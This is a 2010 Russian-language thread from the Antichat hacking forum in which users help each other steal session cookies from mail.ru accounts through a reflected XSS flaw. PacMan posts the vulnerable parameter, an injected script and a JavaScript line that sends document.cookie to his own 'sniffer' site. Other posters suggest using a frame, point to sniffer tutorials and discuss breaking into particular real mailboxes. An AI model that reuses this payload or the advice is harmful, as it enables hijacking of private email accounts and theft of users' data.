ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   XSS Вопрос (https://forum.antichat.xyz/showthread.php?t=8029133)

dimaxx 18.01.2010 01:00

Жириновский настоящий насчет медведя не знаю да и не стоит туда лезть не по зубам тебе эти акк там спец защита небось .Насчет сниффа попробуй со свой почты залезть придут куки или нет.И еще зделай все через фрейм а то все как то покривому скорее у тебя куки приходятс твоего сайта

PacMan 18.01.2010 01:00

1. У меня есть уязвимость xss mail.ru, ?inf=">alert('OK')
2. В index.html вот ...?inf=">
3. В xss.js вот img = new Image(); img.src = "http://мой сайт/jpg/s.jpg?"+document.cookie;
Сниффер свой.

Проблема вот с чем, посылаю письмо, переходит на уязвимую страницу и все, cookies нет.
Проблема думаю в 3., только незнаю как исправить.
Кто может, помогите.

Еще вот:

Скрытый текст (вы должны быть авторизованы и иметь 15 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Это настоящие почтовые ящики ... или нет?

PacMan 19.01.2010 01:00

Они у меня вообще не приходят.
Все стопорится на уязвимости, открывается страница сайта с уязв. и все, а по идее должно проскочить и перекинуть на сайт который я прописал.
...............
Все разобрался.

Odour 28.01.2010 01:00

там где вход в сниффер видео,посмотри и здесь на форуме тоже видео есть
для новичков там тоже посмотри.знать больше по снифферу будешь.
а по части ящиков посмотри "мой мир",ящиков.


Время: 00:27